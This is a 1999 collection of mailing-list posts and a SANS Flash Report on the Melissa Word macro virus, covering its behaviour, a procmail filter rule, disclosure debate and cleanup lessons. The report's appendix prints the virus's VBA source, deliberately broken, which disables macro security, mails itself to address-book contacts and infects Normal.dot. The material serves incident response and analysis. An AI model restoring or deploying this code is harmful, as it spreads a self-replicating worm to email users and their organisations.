This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

J-026: HP-UX rpc.pcnfsd Vulnerability
J-027: Digital Unix Vulnerabilities ( at , inc )
J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
J-029: Buffer Overflows in Various FTP Servers
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5.2

iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9
+XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW
Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI
wuSjLbuYabo=
=KVaC
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 18:12:54 -0500 (EST)
From: Greg A. Woods <woods@most.weird.com>
Reply-To: Phil-Sec@datasys.net
To: Phil-Sec@datasys.net
Subject: RE: Phil-Sec: `Good Times', come to life: Melissa

[ On Sunday, March 28, 1999 at 16:49:49 (-0500), ROD VERNEN wrote: ]
> Subject: RE: Phil-Sec: `Good Times', come to life: Melissa
>
> Good points. But WinWord can be configured to require confirmation
> before executing a macro. This is an area where user education is
> critical...

The Melissa "virus" isn't just an ordinary "word processor" macro but
rather a Visual BASIC Application extension thing that gets run by the
application when the document is open. According to CERT neither Word97
nor Word2000 list the macro when an infected document is opened with
macros disabled, even if you explicitly look for macros -- i.e. you can
only see the macro if you let it execute. This is absurdly stupid.

(And of course what's also insidious, and new to me, about this "virus" is
that it immediately and silently disables the feature which would
normally require confirmation before executing macros, thus opening up
the door for its simpler bretheren, so to speak.)

--
Greg A. Woods

+1 416 218-0098 VE3TCP <gwoods@acm.org> <robohack!woods>
Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com>

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 21:58:17 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Malicious code detection and full disclosure

I have been getting a lot of flames and veiled threats from individuals
and "virus researchers" for posting the code yesterday. There seems to be
a lot of misinformation going around so I wanted to clarify the situation.
These people are all producing the same arguments:

1. "Posting the source allows someone to know how to write a Macro virus"

Yes, and anyone of the 100,000 or more people who got the virus the other
day can buy VB and do File->Open and see the source. Repeat after me:
"Word macros are INTERPRETED". All symbol information is present. No
decompilation necessary.

2. "By reformatting the source, you have created a new variant"

What? Your virus scanner could be thwarted by adding whitespace? Someone
has a problem but it isn't me. Perhaps you'd best learn from the sandbox
mechanisms of Java or virus scanners like F-PROT. A virus is not a virus
because it has the string "By 3le3t3 DudEZ" followed by three tabs. It is
a virus because it does things like update Normal.dot. Repeat after me:
"Pattern matching alone does not a virus scanner make". Just as in the
recent thread about security scanners doing version-checking instead of
exploiting a hole, the best answer is to use a combination of techniques
to identify flaws or malicious code and then notify the user of any
uncertainties in the detection mechanism.

A perfect parallel to this is the Internet worm. We were reminded of that
time as we paused the Exchange SMTP service to keep the program from
spreading. Also, it was important to quickly analyze the program, making
sure it did nothing malicious like mailing a person's files to another
location. After doing this, I believed the code itself would help others
do the same if they needed to. An important note is that the Symantec and
McAfee web pages describing the virus both left out important information
(for instance, avertlabs.com neglected to mention the active document and
Normal.dot file infection). If I had made any mistakes in my analysis,
another could have determined this for himself.

A good reference is the paper "With Microscope and Tweezers, An Analysis
of the Internet Worm" by Mark Eichin and Jon Rochlis. It can be found at:

http://www.mit.edu:8001/people/eichin/www/virus/main.html

In short, this is the same full disclosure vs. security through obscurity
debate. Make your own decision what is appropriate; my mind has been made
up in regards to this for at least a decade. Viruses tend to be
uninventive and boring. This one was extremely unsophisticated, exploited
no new holes, and required user carelessness to spread. I only got
involved because I had to help fend off the nuisance Friday. I hope
everyone found the postings useful and will demand better virus protection
than string matching from their virus scanner vendor as well as request
that Microsoft add more virus prevention than "enable macros? yes/no" and
disallow macros from doing things like sending mail or writing to files
without notice to the user.

-Nate

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 20:12:22 -0800
From: John D. Hardin <jhardin@wolfenet.com>
To: BUGTRAQ@netspace.org
Subject: Re: Blocking the Melissa Trojan

On Sat, 27 Mar 1999, Brett Glass wrote:

>At 03:28 PM 3/27/99 -0800, John D. Hardin wrote:
>>On Sat, 27 Mar 1999, Brett Glass wrote:
>>
>>> Excellent. Is there a default "poisoned executables" file in the
>>> package? Or do admins have to construct a list themselves?
>>
>>They have to make it themselves if they wish to use the facility. The
>>web page has a suggested list of filenames.
>
> Sounds good. Now, for the next twist to the story.
>
> It turns out that the Melissa code also infects NORMAL.DOT, so that
> the computer starts producing infected documents. When one of those
> documents hits a machine that hasn't been infected yet, that machine
> sends out a barrage of e-mail.... Using the NEW document as the
> attachment! It'll have a different name. So, we also need to filter
> by subject and body.

That's a job that regular procmail is well suited to. If the subject
is fixed (hang on, reading bugtraq...)

Per Aleph1:
The subject line is "important Message From <some user name>". The
body consist of the text "Here is that document you asked for...
don't show anyone else;-)".

That's fairly simple...

:0 H
* ^Subject:.*important Message From
{
:0 B
* Here is that document you asked for
* don't show anyone else
* ^Content-.*: .*\.do[ct]
{
LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '

:0
security-quarantine
}
}

--
John Hardin KA7OHZ jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
In the Lion
the Mighty Lion
the Zebra sleeps tonight...
Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
52 days until Star Wars episode I

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:16:29 +0000
From: Vesselin Bontchev <bontchev@COMPLEX.IS>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)

Aaron Wood writes (my comments are on Trend's press release forwarded by
him):

> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.

In Word 2000, the virus disables the Tools/Macro/Security menu.

> The name of the original infected attachment was List.doc, but it
> could be any name.

Theoretically, yes. But keep in mind, that the virus sends itself by
e-mail only when it infects a clean system. What it sends, is the
document which as infected the system. Originally, the virus was
distributed in a file named LIST.DOC and posted to alt.sex by a person
known to have posted new viruses to the newsgroups before. So, in most
cases this is the document which infects the systems for the first time
and it is what is sent around. The only way to begin sending something
else is if you get infected by opening another user's infected document
which you have received by other means (i.e., not by the virus sending
it to you).

> If the user does not have Outlook, the virus will not work.

That's not true - the virus works perfectly, in the sense that it
replicates and infects. It just can't send itself around in e-mail
attachments. But, as we know, this is by far not the only way a virus
can use to spread. :-)

Another thing - the virus never terminates the copy of Outlook it starts
- at least not explicitly. I haven't verified that, but if that copy
really remains in memory, opening several infected documents would
eventually slow down and crash your system - because of the many copies
of Outlook running in the background. The virus starts Outlook each time
you open an infected document - although it sends itself by e-mail only
if the system wasn't already infected.

> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.

"File" here means "whatever is not infected - either the active document
or the normal template".

> Trend Micro has detection for this virus in its latest pattern update,

Most anti-virus producers have. The update for our product (F-PROT and
F-MACROW) can be found at the usual place:

ftp://ftp.complex.is/pub/macrdef2.zip

Regards,
Vesselin
--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
Postholf 7180, IS-127, Reykjavik, Iceland producers of F-PROT.
e-mail: bontchev@complex.is, tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44 E5 F7 C3 18 EA 2B AE 4E

----------------------------------------------------------------------------

Date: Mon, 29 Mar 1999 14:46:24 -0500 (EST)
From: sans@clark.net
Subject: EXTRA: SANS Flash Report on the Melissa Virus

Once or twice a year, the magnitude of a security event is great enough
to merit a SANS Flash Report. It is amazing and coincidental that it
happens in the same 24 hour period that we send out the first SANS
Newsbites.

NOTE: SANS will be changing email and web servers this week. We hope
to avoid service interruptions, but some error might creep in. Problems
to <kolstad@delos.com>.

Table of Contents:
1. What Melissa teaches us
1.1 Infection Speed
1.2 Collateral Damage
1.3 Need for Defense in Depth
2. One site's experience in cleaning up after a Melissa infestation
3. Conclusion
Appendix: Melissa Source Code

You will already have heard of the Melissa virus, at least from the SANS
Newsbites, and probably also from newspapers and friends, as well. An
excellent description of the virus, including how to identify it and
contain it at the host level, was developed by the Computer Emergency
Response Team at Carnegie Mellon University. This document is available
at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .

The major anti-virus vendors have already released descriptions and
anti-viral signatures. URLs for NAI and Symantec are listed below:
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
http://www.symantec.com/avcenter/venc/data/mailissa.html

The rapid response of these organizations has been very impressive, and
your response should be equally rapid. If you have not yet taken the
steps described in the CERT advisory, follow the instructions referenced
above and get your site's virus signatures updated and the infected
machines contained and cleaned. Then read the rest of this document
that tells some of the lessons learned and also the bigger picture
surrounding the Melissa Macro virus. We discuss the implications of
information gathering viruses like Melissa, the process and impact of
cleaning up after an outbreak at a military site and finally, share a
non-working version of the code to help you understand what these viruses
do.

1. What Melissa teaches us

1.1 Infection Speed

According to NAI's web site listed above, the virus was first discovered
on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
was first discovered "in the wild" it caused major infections and reports
>from a large number of Department of Defense and Department of Energy
sites. Many of you will probably find out today that your site has been
infected as well. This serves as a warning how fast a virus with an
unknown signature can spread. A modified, non-operative copy of the
source code is included as an appendix to this document. If you search
the listing for the string "For y = 1 To", you can see how the virus
replicated so rapidly by going through Microsoft Outlook address books
and sending itself to the first 50 entries in each book. Sections in
the code that have been the subject of news reports are marked with
comments that begin with ***.

Useful Background Information: In the March 2nd SANS First Tuesday
Intrusion Detection Web Broadcast, archived at
http://www.sans.org/webarchives.htm, Stephen Northcutt described another
MS Word Macro Virus, M97.Marker.a. Marker is an information gathering
virus which uses FTP to send the Microsoft Office registration information
of infected systems to outside organizations. Northcutt described how
this same technique would allow a prospective attack to develop an
infection map and by knowing who sends what to whom, to target future
attacks.

1.2 Collateral Damage

The Melissa virus apparently does not create any other damage in the
sense of deleting, or stealing files. However, when the smoke clears,
the cost of dealing with Melissa will be measured in the millions of
dollars. It also directly affects sites' ability to send and receive
email. One network engineer, who worked at one of the first sites to
report the problem last Friday March 26, said "I knew something was
wrong before I knew what was wrong. I could feel the network going
slower and slower. As I looked into it, I found the exchange mail
servers were melting down." One of the lessons of Melissa is that a
macro virus can hit very fast and very hard. The engineer went on to
say, "As I composed the last email of the day, a message hit the Inbox
of my Microsoft Outlook email application. The subject line read:
"Important Message From [Jane Doe]". I viewed the message, and the body
read "Here is that document you asked for... don't show anyone else ;-)"
Attached was a Microsoft Word document titled "list1.doc".

"Although I hadn't requested any documents from [Jane Doe], I was
expecting a couple of them from other people. It wasn't inconceivable
to think that she had become involved, even though I didn't know who
she was. I double-clicked on the Word document. A pop-up window appeared,
warning me that a macro was contained in the document, and that macros
can potentially be dangerous. I knew that... :-) So, I shut down the
Word application, and checked the document with several of the virus
detection packages that I had. Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted
source, I went ahead and opened the document with the macros enabled.
In less than a second, a duplicate of the message had hit my mailbox,
this time with my name attached. I hit the power-off button on my
computer, but it was late. The payload had been delivered. My name
was now attached to a file containing pornographic web sites, and an
apparent username and password for each site. Moments later, duplicate
messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This
virus (or worm) was snowballing fast, too fast. I immediately called
our information systems security manager, only to find that his phone
was already busy. I left a voicemail detailing my appraisal of the
situation, and my fear that this incident could get serious... very
quickly. What I didn't know was that I was too late, it was already
*very* serious."

1.3 Need for Defense in Depth

Though Melissa is primarily spread by e-mail, passing an infected floppy
disk works just as well to move the virus to a new system, possibly even
a new organization. If there was ever any doubt about whether we need
to take virus countermeasures seriously, that time is past. We recommend
virus scanning at the firewall, on servers, and on the desktop systems
as well as physical entry points for magnetic media for sites that want
to avoid the kind of punch Melissa exhibited.

2. One site's experience in cleaning up after a Melissa infestation

Here's a first-person description of the process one site used to clean
up after being hit by Melissa.

"As soon as we discovered the virus late Friday afternoon, we disconnected
our servers (all SMTP relays and Exchange servers at our Internet
connection) from the network until we could contain the infection. This
happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange
servers worked through Friday night and well into Saturday. Many returned
Saturday and again on Sunday to complete the isolation and cleanup. They
cleaned up the Exchange servers with updated anti-viral signatures as
soon as they were available. The corporate servers and one departmental
server were ready to come back on-line late Sunday. We left IMS (Internet
Mail Service) disabled until we could contain (filter) email at the SMTP
server.

"Our version of sendmail is one removed from the latest and filter
updates provided by the author would not work on our version. We resorted
to getting the word out for ALL users to update the AV signatures and
refrain from sending Word docs until any with macros had been identified
as coming from trusted sources. The administrator for the SMTP relay
host downloaded a trial version of InterScan VirusWall from TrendMicro.
For more info, see: http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many
things in our favor:
* System administrators were still at work when the problem started
(approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the
problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained
in incident handling based on the SANS' Incident Handling Step by Step
approach.
* The person who needed to make key decisions was trained in incident
response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported
the Incident Handling team by not directing what needed to be done (at
least so far)."

Note: The stages of incident handling are: preparation, identification,
containment, eradication, and follow-up. The URLs at the beginning of
this document can help you with identification and eradication. Your
organization may need to consider email server down time in order to
achieve containment. You may also want to consider setting up non-email
communication channels for your organization. If you do not know how
to build a telephone call tree, look for a "soccer mom". They know how
to spread important information very efficiently. In this way, if you
do suffer an email meltdown, you can still get important information,
such as where to acquire the latest anti-virus software, to your users.

3. Conclusion

Because Melissa exploits one of the most valuable benefits of the net
-- the ability to share documents -- to propagate and to multiply itself,
it will affect far more people far more quickly than earlier viruses.
The silver lining in this cloud is that a relatively benign virus like
Melissa is a low-cost way of gaining user awareness. That same mechanism
can be used by a more malicious attacker to make private information
public and to destroy large amounts of important data. It makes sense
for you to use this opportunity to establish three capabilities if you
have not already done so:
(1) user responsibility and active involvement in protecting their
systems
(2) an incident handling capability (Order Incident Handling Step-by-Step
from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say
when they call about a security threat.

In addition, we at SANS want to hear your experiences and the lessons
you learned in responding to Melissa. Please send your Melissa-related
tips, tricks, techniques, experiences and lessons learned to info@sans.org
with Melissa in the subject line. This type of sharing can help all
sites be in a better position to respond the next time an event like
this occurs.

Appendix: Melissa Source Code

NOTE: Several errors have been introduced into this copy of the code as
a safety measure. It will not run in this form. We hope the code we
changed will not overly impact your opportunity to understand how the
software works, but we could not be responsible for furthering the spread
of the live version of Melissa. Text comments have been inserted at
the "famous" locations preceded by three asterisks "***"

*** Begins by checking security, the environment, and whether already
infected

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
"... by Kwyjibo" Then
If UngaDasOutlook = "Inlook" Then
DasMapName.Logon "profile", "password"
For y = 1 To DasMapName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakOffASlice.Recipients.Add Peep
x++
If x < 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body =
"Here is that document you asked for ... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From" This could
change of course in future versions ***

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
"... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo END
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And
(InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for using all my letters.
Game's over. I'm outta here."

End Sub

*** The lines above are some of the most published information about
this virus. Though you can look for the virus with intrusion detection
and other string matching security tools by searching for keywords like
"Kwyjibo", simple modifications of the code could change these. ***

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 21:40:59 -0600
From: Simple Nomad <thegnome@NMRC.ORG>
To: BUGTRAQ@netspace.org
Subject: "Leaking" of docs via Melissa

An interesting thing -- as users are infected with Melissa some of the new
documents they create after infection become the carrier and are mailed
out. If you scan for inbound messages, it would be advised to scan for
outbound messages as well. I received a copy of an employee evaluation
>from an old client, and considering the poor rating of this guy I'd say
there's a lawsuit in the making as it apparently went not only to me but
to an internal email bulletin board.

Simple Nomad //
thegnome@nmrc.org // ....no rest for the Wicca'd....
www.nmrc.org //


Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    17 Files
  • 25
    Jan 25th
    34 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close